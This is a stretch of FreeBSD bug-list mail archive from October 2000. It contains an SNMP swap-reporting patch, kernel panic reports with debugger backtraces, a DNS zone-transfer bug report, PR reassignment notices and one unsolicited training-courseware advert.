From owner-freebsd-bugs Sun Oct 29 2: 4:16 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from safins.ne.jp (charley.safins.ne.jp [202.212.16.10]) by hub.freebsd.org (Postfix) with ESMTP id D8A5F37B479 for ; Sun, 29 Oct 2000 02:04:13 -0800 (PST) Received: from cusl2 (pppfaa.safins.ne.jp [202.212.16.129]) by safins.ne.jp (8.9.3/3.7W) with ESMTP id TAA29334 for ; Sun, 29 Oct 2000 19:04:12 +0900 Date: Sun, 29 Oct 2000 19:04:12 +0900 From: takahashi ryoji To: "freebsd-bugs@FreeBSD.ORG" Subject: [PATCH] ports/net/ucd-snmp Message-Id: <20001029190410.9DAE.RYOJI@safins.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.00 (beta 32) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] ports/net/ucd-snmp Category: ports Class: change-request Confidential: no Severity: non-critical Priority: low Release: FreeBSD 4.1-RELEASE i386 Description: The value of enterprises.ucdavis.memory.memTotalSwap.0 and enterprises.ucdavis.memory.memAvailSwap.0 is indicated in 1/4. Fix: /usr/ports/net/ucd-snmp/work/ucd-snmp-4.1.2/agent/mibgroup/ucd-snmp diff -rNu memory_freebsd2.c.old memory_freebsd2.c --- memory_freebsd2.c.old Sun Oct 29 13:20:28 2000 +++ memory_freebsd2.c Sun Oct 29 16:15:11 2000 @@ -151,6 +151,7 @@ char *header; int hlen, nswdev, dmmax; int i, idiv, n; + int pagesize = getpagesize(); struct swdevt *sw; long blocksize; static kvm_t *kd = NULL; @@ -188,13 +189,10 @@ /* Convert to kb */ header = getbsize(&hlen, &blocksize); - idiv = blocksize / 512; - if (idiv > 0) { - swapTotal /= idiv; - swapUsed /= idiv; - swapFree /= idiv; - } + swapTotal = swapTotal * pagesize / blocksize; + swapUsed = swapUsed * pagesize / blocksize; + swapFree = swapFree * pagesize / blocksize; free(sw); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 2:20:12 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B19BD37B663 for ; Sun, 29 Oct 2000 02:20:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA52388; Sun, 29 Oct 2000 02:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from goliath.siemens.de (goliath.siemens.de [194.138.37.131]) by hub.freebsd.org (Postfix) with ESMTP id 4CAAF37B479 for ; Sun, 29 Oct 2000 02:14:23 -0800 (PST) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by goliath.siemens.de (8.11.0/8.11.0) with ESMTP id e9TAEKl28731 for ; Sun, 29 Oct 2000 11:14:21 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail1.siemens.de (8.11.0/8.11.0) with ESMTP id e9TAEKF26623 for ; Sun, 29 Oct 2000 11:14:20 +0100 (MET) Received: (from localhost) by curry.mchp.siemens.de (8.11.1/8.11.1) id e9TAEKg34152 for FreeBSD-gnats-submit@freebsd.org; Sun, 29 Oct 2000 11:14:20 +0100 (CET) Message-Id: <200010291014.e9TAEKF69401@curry.mchp.siemens.de> Date: Sun, 29 Oct 2000 11:14:20 +0100 (CET) From: Andre Albsmeier To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/22391: panic: worklist_remove: not on list Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22391 >Category: kern >Synopsis: panic: worklist_remove: not on list >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 02:20:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 4.1.1-STABLE i386 >Organization: >Environment: FreeBSD 4.1.1-STABLE i386 Copyright (c) 1992-2000 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.1.1-STABLE #9: Mon Oct 23 08:49:27 CEST 2000 root@server.ofw.tld:/src/obj-4/src/src-4/sys/server Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 463493598 Hz CPU: Pentium III/Pentium III Xeon/Celeron (463.49-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x672 Stepping = 2 Features=0x383f9ff real memory = 268419072 (262128K bytes) avail memory = 258322432 (252268K bytes) Preloaded elf kernel "kernel" at 0xc02dc000. ccd0: Concatenated disk driver Pentium Pro MTRR support enabled npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pcib1: at device 1.0 on pci0 pci1: on pcib1 pci1: at 0.0 irq 11 isab0: at device 4.0 on pci0 isa0: on isab0 pci0: at 4.1 pci0: at 4.2 intpm0: port 0xe800-0xe80f irq 9 at device 4.3 on pci0 intpm0: I/O mapped e800 intpm0: intr IRQ 9 enabled revision 0 smbus0: on intsmb0 smb0: on smbus0 intpm0: PM I/O mapped e400 ahc0: port 0xd000-0xd0ff mem 0xdf000000-0xdf000fff irq 15 at device 9.0 on pci0 aic7880: Single Channel A, SCSI Id=7, 16/255 SCBs ahc1: port 0xb800-0xb8ff mem 0xde800000-0xde800fff irq 12 at device 10.0 on pci0 aic7880: Single Channel A, SCSI Id=7, 16/255 SCBs fxp0: port 0xb400-0xb43f mem 0xdd800000-0xdd8fffff,0xde000000-0xde000fff irq 10 at device 11.0 on pci0 fxp0: Ethernet address 00:90:27:54:09:41 pcib2: at device 12.0 on pci0 pci2: on pcib2 fxp1: port 0xa800-0xa81f mem 0xdd000000-0xdd0fffff,0xe3000000-0xe3000fff irq 11 at device 4.0 on pci2 fxp1: Ethernet address 00:90:27:d3:16:b7 fxp2: port 0xa400-0xa41f mem 0xdc800000-0xdc8fffff,0xe2800000-0xe2800fff irq 10 at device 5.0 on pci2 fxp2: Ethernet address 00:90:27:d3:16:b8 ahc2: port 0x9800-0x98ff mem 0xdc000000-0xdc000fff irq 15 at device 13.0 on pci0 aic7892: Wide Channel A, SCSI Id=7, 32/255 SCBs ahc3: port 0x9400-0x94ff mem 0xdb800000-0xdb800fff irq 12 at device 14.0 on pci0 aic7892: Wide Channel A, SCSI Id=7, 32/255 SCBs atkbdc0: at port 0x60,0x64 on isa0 atkbd0: irq 1 on atkbdc0 vga0: at port 0x3b0-0x3df iomem 0xa0000-0xbffff on isa0 sc0: on isa0 sc0: VGA <9 virtual consoles, flags=0x200> fdc0: at port 0x3f0-0x3f5,0x3f7 irq 6 drq 2 on isa0 fdc0: FIFO enabled, 8 bytes threshold fd0: <1440-KB 3.5" drive> on fdc0 drive 0 sio0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0 sio0: type 16550A sio1 at port 0x2f8-0x2ff irq 3 on isa0 sio1: type 16550A ppc0: at port 0x378-0x37f irq 7 on isa0 ppc0: SMC-like chipset (ECP/EPP/PS2/NIBBLE) in COMPATIBLE mode ppc0: FIFO with 16/16/9 bytes threshold lpt0: on ppbus0 lpt0: Interrupt-driven port (da0:ahc0:0:0:0): Duplicate Wired Device entry! (da0:ahc0:0:0:0): Second device (da device at scbus0 target 1 lun 0) will not be wired sa0 at ahc1 bus 0 target 4 lun 0 sa0: Removable Sequential Access SCSI-2 device sa0: 10.000MB/s transfers (10.000MHz, offset 15) da20 at ahc2 bus 0 target 0 lun 0 da20: Fixed Direct Access SCSI-3 device da20: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da20: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) da3 at ahc0 bus 0 target 3 lun 0 da3: Fixed Direct Access SCSI-2 device da3: 10.000MB/s transfers (10.000MHz, offset 15) da3: 2047MB (4194058 512 byte sectors: 255H 63S/T 261C) da2 at ahc0 bus 0 target 2 lun 0 da2: Fixed Direct Access SCSI-2 device da2: 20.000MB/s transfers (20.000MHz, offset 15), Tagged Queueing Enabled da2: 22130MB (45322644 512 byte sectors: 255H 63S/T 2821C) da4 at ahc0 bus 0 target 4 lun 0 da4: Fixed Direct Access SCSI-2 device da4: 20.000MB/s transfers (20.000MHz, offset 15), Tagged Queueing Enabled da4: 8682MB (17781520 512 byte sectors: 255H 63S/T 1106C) da21 at ahc2 bus 0 target 1 lun 0 da21: Fixed Direct Access SCSI-3 device da21: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da21: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) da22 at ahc2 bus 0 target 2 lun 0 da22: Fixed Direct Access SCSI-3 device da22: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da22: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) ch0 at ahc1 bus 0 target 4 lun 1 ch0: Removable Changer SCSI-2 device ch0: 10.000MB/s transfers (10.000MHz, offset 15) ch0: 7 slots, 1 drive, 1 picker, 0 portals cd0 at ahc0 bus 0 target 6 lun 0 cd0: Removable CD-ROM SCSI-2 device cd0: 20.000MB/s transfers (20.000MHz, offset 15) cd0: Attempt to query device size failed: NOT READY, Medium not present da30 at ahc3 bus 0 target 0 lun 0 da30: Fixed Direct Access SCSI-3 device da30: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da30: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) da31 at ahc3 bus 0 target 1 lun 0 da31: Fixed Direct Access SCSI-3 device da31: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da31: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) da32 at ahc3 bus 0 target 2 lun 0 da32: Fixed Direct Access SCSI-3 device da32: 160.000MB/s transfers (80.000MHz, offset 63, 16bit), Tagged Queueing Enabled da32: 17501MB (35843670 512 byte sectors: 255H 63S/T 2231C) da0 at ahc0 bus 0 target 0 lun 0 da0: Fixed Direct Access SCSI-2 device da0: 20.000MB/s transfers (20.000MHz, offset 15), Tagged Queueing Enabled da0: 4357MB (8925000 512 byte sectors: 255H 63S/T 555C) da1 at ahc0 bus 0 target 1 lun 0 da1: Fixed Direct Access SCSI-2 device da1: 20.000MB/s transfers (20.000MHz, offset 15), Tagged Queueing Enabled da1: 4357MB (8925000 512 byte sectors: 255H 63S/T 555C) Mounting root from ufs:/dev/da0s1a WARNING: / was not properly dismounted fxp0: promiscuous mode enabled fxp1: promiscuous mode enabled fxp2: promiscuous mode enabled >Description: Machine crashed at 2:14 a.m. root@server:/var/crash>gdb -k /usr/obj/src/src-4/sys/server/kernel.debug vmcore.5 GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... IdlePTD 3072000 initial pcb at 27bd80 panicstr: softdep_lock: locking against myself panic messages: --- panic: worklist_remove: not on list syncing disks... panic: softdep_lock: locking against myself Uptime: 3d8h40m18s (da20:ahc2:0:0:0): SYNCHRONIZE CACHE. CDB: 35 0 0 0 0 0 0 0 0 0 (da20:ahc2:0:0:0): error code 64 (da21:ahc2:0:1:0): Synchronize cache failed, status == 0xb, scsi status == 0x0 dumping to dev #da/9, offset 475744 dump 255 254 253 252 251 250 249 248 247 246 245 244 243 242 241 240 239 238 237 236 235 234 233 232 231 230 229 228 227 226 225 224 223 222 221 220 219 218 217 216 215 214 213 212 211 210 209 208 207 206 205 204 203 202 201 200 199 198 197 196 195 194 193 192 191 190 189 188 187 186 185 184 183 182 181 180 179 178 177 176 175 174 173 172 171 170 169 168 167 166 165 164 163 162 161 160 159 158 157 156 155 154 153 152 151 150 149 148 147 146 145 144 143 142 141 140 139 138 137 136 135 134 133 132 131 130 129 128 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 --- #0 boot (howto=260) at /src/src-4/sys/kern/kern_shutdown.c:302 302 dumppcb.pcb_cr3 = rcr3(); (kgdb) where #0 boot (howto=260) at /src/src-4/sys/kern/kern_shutdown.c:302 #1 0xc0158315 in panic ( fmt=0xc024bc60 "softdep_lock: locking against myself") at /src/src-4/sys/kern/kern_shutdown.c:552 #2 0xc01e5655 in acquire_lock (lk=0xc026ec9c) at /src/src-4/sys/ufs/ffs/ffs_softdep.c:260 #3 0xc01e9350 in softdep_update_inodeblock (ip=0xc1b08d00, bp=0xc69cf8f0, waitfor=0) at /src/src-4/sys/ufs/ffs/ffs_softdep.c:3585 #4 0xc01e4925 in ffs_update (vp=0xce28cf00, waitfor=0) at /src/src-4/sys/ufs/ffs/ffs_inode.c:105 #5 0xc01ec6b4 in ffs_sync (mp=0xc1715c00, waitfor=2, cred=0xc0a37680, p=0xc028f7e0) at /src/src-4/sys/ufs/ffs/ffs_vfsops.c:987 #6 0xc0185cd3 in sync (p=0xc028f7e0, uap=0x0) at /src/src-4/sys/kern/vfs_syscalls.c:544 #7 0xc0157d4b in boot (howto=256) at /src/src-4/sys/kern/kern_shutdown.c:224 #8 0xc0158315 in panic (fmt=0xc024be3f "worklist_remove: not on list") at /src/src-4/sys/kern/kern_shutdown.c:552 #9 0xc01e5871 in worklist_remove (item=0xc1ea7580) at /src/src-4/sys/ufs/ffs/ffs_softdep.c:417 #10 0xc01e7379 in check_inode_unwritten (inodedep=0xc1ea7580) at /src/src-4/sys/ufs/ffs/ffs_softdep.c:1894 #11 0xc01e72df in softdep_freefile (pvp=0xce2f8400, ino=15308553, mode=33024) at /src/src-4/sys/ufs/ffs/ffs_softdep.c:1853 #12 0xc01e3644 in ffs_vfree (pvp=0xce2f8400, ino=15308553, mode=33024) at /src/src-4/sys/ufs/ffs/ffs_alloc.c:1468 #13 0xc01e1caa in ffs_valloc (pvp=0xce2f8400, mode=33024, cred=0xc24e0780, vpp=0xce0bcc54) at /src/src-4/sys/ufs/ffs/ffs_alloc.c:602 #14 0xc01f3e67 in ufs_makeinode (mode=33024, dvp=0xce2f8400, vpp=0xce0bcee0, cnp=0xce0bcef4) at /src/src-4/sys/ufs/ufs/ufs_vnops.c:2080 #15 0xc01f1490 in ufs_create (ap=0xce0bce00) at /src/src-4/sys/ufs/ufs/ufs_vnops.c:184 #16 0xc01f40fd in ufs_vnoperate (ap=0xce0bce00) at /src/src-4/sys/ufs/ufs/ufs_vnops.c:2285 #17 0xc018a15c in vn_open (ndp=0xce0bcecc, fmode=2562, cmode=256) at vnode_if.h:106 #18 0xc0186425 in open (p=0xcdec0c60, uap=0xce0bcf80) at /src/src-4/sys/kern/vfs_syscalls.c:989 #19 0xc0224315 in syscall2 (frame={tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = 292, tf_esi = -1, tf_ebp = -1077937728, tf_isp = -838086700, tf_ebx = 4, tf_edx = 134590784, tf_ecx = 2, tf_eax = 5, tf_trapno = 7, tf_err = 2, tf_eip = 403670848, tf_cs = 31, tf_eflags = 659, tf_esp = -1077937772, tf_ss = 47}) at /src/src-4/sys/i386/i386/trap.c:1150 #20 0xc0218825 in Xint0x80_syscall () #21 0x804c95e in ?? () #22 0x804e03a in ?? () #23 0x804dd8d in ?? () #24 0x804e9f7 in ?? () #25 0x804bc4a in ?? () #26 0x80493e1 in ?? () (kgdb) >How-To-Repeat: unknown >Fix: unknown. I have saved the coredump and the kernel so I can examine more things if someone tells me what to do... >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 2:32:41 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from vector.intergate.ca (vector.intergate.ca [207.34.179.20]) by hub.freebsd.org (Postfix) with SMTP id E04DD37B4C5 for ; Sun, 29 Oct 2000 02:32:37 -0800 (PST) Received: (qmail 11534 invoked by uid 1007); 29 Oct 2000 10:33:40 -0000 Received: from beowulf@quik.com by vector.intergate.ca with qmail-scanner-0.90 (uvscan: v4.0.50/v4054. . Clean. Processed in 0.130701 secs); 29/10/2000 02:33:40 Received: from gateway-208.181.229.173.intergate.ca (HELO quik.com) (208.181.229.173) by vector.intergate.ca with SMTP; 29 Oct 2000 10:33:40 -0000 From: beowulf@quik.com Reply-To: beowulf@quik.com To: bugs@freebsd.org Subject: Attn: Corporate Traing Coordinator - Windows 2000 Courseware Content Message-Id: <20001029103237.E04DD37B4C5@hub.freebsd.org> Date: Sun, 29 Oct 2000 02:32:37 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you restructure your IT training program and consider how you might imagine the best way of providing content for your courses, you'll find yourself appreciating course content that is already prepared and ready for immediate use in your curriculum. We design and develop books and curriculum that support Systems Engineering technologies and certifications including: · A+ · Network+ · i-Net+ · MCSE · MCDBA (Full course descriptions are available) Some of our books have been top 10 best sellers through Amazon.com. Included with this letter are descriptions of the books that we sell (see Study Guide Descriptions). I thought you might also be interested to hear about our adaptive and non-adaptive test engine slated to be available 3rd quarter, 2000. The engine is designed for practice and study. Test questions and answers are easily added, edited or deleted. We can help you with your high-tech training needs including books, books on CD, Instructor led classes and distance learning products. We also create custom high-tech curriculum for companies. We are a one-stop solution for high-tech educational content, training and resources. We offer distance learning and instructor lead products for both individuals and groups and our education solutions meet typical corporate and learning center needs. We are a Microsoft Solution Provider (MSP), Microsoft Certified Technical Education Center (CTEC) and a Computer Technology Industry Association Certified Training Center (CompTIA). We partner with a major University, an international leader in adult-instructor-lead and distance learning, to offer graduate and undergraduate credit for many of our courses. Please feel free to contact me in the mean time. I look forward speaking with you further. Casey Lea, Creative Director or Domhnall Adams, CS DCGNA, CS and Associates 780-998-4066 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 4:41:16 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0368137B4C5; Sun, 29 Oct 2000 04:41:11 -0800 (PST) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA10551; Sun, 29 Oct 2000 04:41:11 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Sun, 29 Oct 2000 04:41:11 -0800 (PST) From: Message-Id: <200010291241.EAA10551@freefall.freebsd.org> To: jedgar@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/22352: Fixit doesn't quite work on serial console - sysinstall bug. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fixit doesn't quite work on serial console - sysinstall bug. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: jedgar Responsible-Changed-When: Sun Oct 29 04:39:38 PST 2000 Responsible-Changed-Why: Misfiled PR http://www.freebsd.org/cgi/query-pr.cgi?pr=22352 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 5:50: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EF9937B4CF for ; Sun, 29 Oct 2000 05:50:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA35424; Sun, 29 Oct 2000 05:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 26AFC37B479; Sun, 29 Oct 2000 05:49:47 -0800 (PST) Message-Id: <20001029134947.26AFC37B479@hub.freebsd.org> Date: Sun, 29 Oct 2000 05:49:47 -0800 (PST) From: ran.golde@iname.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/22394: NT based DNS slaves can't make zone transfers from FreeBSD master Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22394 >Category: bin >Synopsis: NT based DNS slaves can't make zone transfers from FreeBSD master >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 05:50:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Ran Golde >Release: 4.1 >Organization: Amdocs Ltd. >Environment: FreeBSD prdns.amdocs.com 4.1-RELEASE FreeBSD 4.1-RELEASE #0: Fri Jul 28 14:30:31 GMT 2000 jkh@ref4.freeb sd.org:/usr/src/sys/compile/GENERIC i386 >Description: When NT SP 6 and above DNS service is operated as secondary, zone transfers (replications) from DNS master of FreeBSD fail. After manuall installation of bind-8.2.2P5 (instead of the 8.2.3 beta from FreeBSD release) problem is solved !!! >How-To-Repeat: >Fix: Ship FreeBSD with official bind-8.2.2P5 and not with the beta version !!! >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 8:31:47 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2B7037B479; Sun, 29 Oct 2000 08:31:46 -0800 (PST) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA95483; Sun, 29 Oct 2000 08:31:46 -0800 (PST) (envelope-from dwmalone@FreeBSD.org) Date: Sun, 29 Oct 2000 08:31:46 -0800 (PST) From: Message-Id: <200010291631.IAA95483@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, bmah@FreeBSD.org Subject: Re: misc/22383: typo (LU-ATX -> LUA-TX) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: typo (LU-ATX -> LUA-TX) Responsible-Changed-From-To: freebsd-bugs->bmah Responsible-Changed-By: dwmalone Responsible-Changed-When: Sun Oct 29 08:31:01 PST 2000 Responsible-Changed-Why: The release notes are Bruces. http://www.freebsd.org/cgi/query-pr.cgi?pr=22383 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 8:40: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 13B4137B4C5 for ; Sun, 29 Oct 2000 08:40:02 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA98030; Sun, 29 Oct 2000 08:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from puppy.lflat.org (dialin-115-032.mobilixnet.dk [212.97.222.32]) by hub.freebsd.org (Postfix) with ESMTP id 5F18137B479 for ; Sun, 29 Oct 2000 08:30:02 -0800 (PST) Received: (from root@localhost) by puppy.lflat.org (8.11.1/8.11.1) id e9TGOL900623; Sun, 29 Oct 2000 17:24:21 +0100 (CET) (envelope-from voland) Message-Id: <200010291624.e9TGOL900623@puppy.lflat.org> Date: Sun, 29 Oct 2000 17:24:21 +0100 (CET) From: voland@lflat.org Reply-To: voland@lflat.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/22397: ulpt0 isn't functional due to incorrect dev pointer passed to usbd_do_request_flags Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22397 >Category: kern >Synopsis: ulpt0 usage leads to kernel panic >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 08:40:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Vadim Belman >Release: FreeBSD 5.0-CURRENT i386 >Organization: Mobilix A/S >Environment: FreeBSD puppy.lflat.org 5.0-CURRENT FreeBSD 5.0-CURRENT #2: Sun Oct 29 13:44:02 CET 2000 root@puppy.lflat.org:/usr/obj/usr/src/sys/PUPPY i386 >Description: If one tries using ulpt0 for printing he would end up with a kernel panic. It occurs due to incorrect dev pointer being passed to usbd_do_request_flags. Here is the panic message and kernel stack trace as from gdb report: ====================================================================== IdlePTD 4214784 initial pcb at 3681c0 panicstr: from debugger panic messages: --- Fatal trap 12: page fault while in kernel mode fault virtual address = 0x20726568 fault code = supervisor read, page not present instruction pointer = 0x8:0xc01811a7 stack pointer = 0x10:0xc842ccb4 frame pointer = 0x10:0xc842cccc code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 2858 (lpd) panic: from debugger panic: from debugger Uptime: 36m38s dumping to dev #da/0x20001, offset 262144 dump 128 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 --- #0 dumpsys () at /usr/src/sys/kern/kern_shutdown.c:475 475 if (dumping++) { #0 dumpsys () at /usr/src/sys/kern/kern_shutdown.c:475 #1 0xc019e6ac in boot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:318 #2 0xc019eaad in panic (fmt=0xc02c5894 "from debugger") at /usr/src/sys/kern/kern_shutdown.c:566 #3 0xc012f945 in db_panic (addr=-1072164441, have_addr=0, count=-1, modif=0xc842cb2c "") at /usr/src/sys/ddb/db_command.c:433 #4 0xc012f8e3 in db_command (last_cmdp=0xc031cbdc, cmd_table=0xc031ca3c, aux_cmd_tablep=0xc03616ac) at /usr/src/sys/ddb/db_command.c:333 #5 0xc012f9aa in db_command_loop () at /usr/src/sys/ddb/db_command.c:455 #6 0xc0131bf7 in db_trap (type=12, code=0) at /usr/src/sys/ddb/db_trap.c:71 #7 0xc029c776 in kdb_trap (type=12, code=0, regs=0xc842cc74) at /usr/src/sys/i386/i386/db_interface.c:163 #8 0xc02a8888 in trap_fatal (frame=0xc842cc74, eva=544367976) at /usr/src/sys/i386/i386/trap.c:934 #9 0xc02a8601 in trap_pfault (frame=0xc842cc74, usermode=0, eva=544367976) at /usr/src/sys/i386/i386/trap.c:853 #10 0xc02a814b in trap (frame={tf_fs = -1071972336, tf_es = 16, tf_ds = 16, tf_edi = 0, tf_esi = 375, tf_ebp = -935146292, tf_isp = -935146336, tf_ebx = -935146236, tf_edx = 544367976, tf_ecx = 544367976, tf_eax = -935146237, tf_trapno = 12, tf_err = 0, tf_eip = -1072164441, tf_cs = 8, tf_eflags = 66118, tf_esp = -1055754752, tf_ss = 375}) at /usr/src/sys/i386/i386/trap.c:436 #11 0xc01811a7 in usbd_do_request_flags (dev=0x20726568, req=0xc842cd04, data=0xc842cd03, flags=0, actlen=0x0) at /usr/src/sys/dev/usb/usbdi.c:938 #12 0xc018117c in usbd_do_request (dev=0x20726568, req=0xc842cd04, data=0xc842cd03) at /usr/src/sys/dev/usb/usbdi.c:919 #13 0xc017d540 in ulpt_status (sc=0xc1127600) at /usr/src/sys/dev/usb/ulpt.c:357 #14 0xc017d6e1 in ulptopen (dev=0xc103fc00, flag=2, mode=8192, p=0xc7fff100) at /usr/src/sys/dev/usb/ulpt.c:418 #15 0xc01e358a in spec_open (ap=0xc842cda0) at /usr/src/sys/miscfs/specfs/spec_vnops.c:200 #16 0xc01e3439 in spec_vnoperate (ap=0xc842cda0) at /usr/src/sys/miscfs/specfs/spec_vnops.c:117 #17 0xc0279071 in ufs_vnoperatespec (ap=0xc842cda0) at /usr/src/sys/ufs/ufs/ufs_vnops.c:2312 #18 0xc01dd467 in vn_open (ndp=0xc842ce74, flagp=0xc842ce40, cmode=48) at vnode_if.h:189 #19 0xc01d8ead in open (p=0xc7fff100, uap=0xc842cf80) at /usr/src/sys/kern/vfs_syscalls.c:999 #20 0xc02a8cf8 in syscall2 (frame={tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = 134578534, tf_esi = -1077937784, tf_ebp = -1077938048, tf_isp = -935145516, tf_ebx = 2, tf_edx = -1077938104, tf_ecx = 2, tf_eax = 5, tf_trapno = 7, tf_err = 2, tf_eip = 269347636, tf_cs = 31, tf_eflags = 582, tf_esp = -1077938092, tf_ss = 47}) at /usr/src/sys/i386/i386/trap.c:1139 #21 0xc029d0df in Xint0x80_syscall () 